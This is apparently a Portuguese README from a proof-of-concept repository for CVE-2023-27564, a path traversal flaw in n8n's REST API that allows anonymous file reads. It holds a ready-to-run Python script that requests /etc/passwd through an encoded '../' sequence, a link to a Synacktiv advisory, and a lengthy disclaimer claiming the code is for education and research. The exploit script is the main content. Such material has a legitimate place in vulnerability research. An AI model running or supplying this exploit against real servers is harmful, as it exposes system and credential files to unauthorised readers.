
Exploit de prova de conceito para CVE-2023-27564 permitindo leitura anônima de arquivos no n8n através de path traversal na API REST. Destinado à pesquisa de segurança e avaliação de vulnerabilidades.
Esta vulnerabilidade permite leitura anónima de ficheiros no n8n.
import requests
url = "https://example.com/rest/data/filesystem:..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd:.svg"
response = requests.get(url)
print(response.status_code)
print(response.headers)
print(response.text)
https://www.synacktiv.com/sites/default/files/2023-05/Synacktiv-N8N-Multiple-Vulnerabilities_0.pdf
O Prova de Conceito (PoC) fornecido neste repositório destina-se exclusivamente a fins educacionais e de pesquisa em segurança. As informações e o código são destinados a profissionais de cibersegurança e pesquisadores, para compreender e proteger contra vulnerabilidades em software e sistemas. Qualquer uso deste PoC, informações relacionadas ou código para atacar alvos sem consentimento mútuo prévio é ilegal e estritamente proibido.
Ao utilizar este PoC, você concorda que compreende o impacto potencial da vulnerabilidade que ele demonstra e que o utilizará de forma responsável e ética. Os autores deste PoC isentam-se de qualquer responsabilidade por uso indevido deste material ou por quaisquer danos que possam ocorrer pela utilização das informações e do código fornecidos. É da responsabilidade do utilizador final cumprir todas as leis locais, estaduais, nacionais e internacionais aplicáveis.
Os autores envidaram todos os esforços para garantir a exatidão e fiabilidade das informações fornecidas neste repositório. No entanto, as informações são fornecidas "como estão", sem qualquer tipo de garantia. Os autores não aceitam qualquer responsabilidade ou obrigação pela exatidão, conteúdo, integridade, legalidade ou fiabilidade das informações contidas.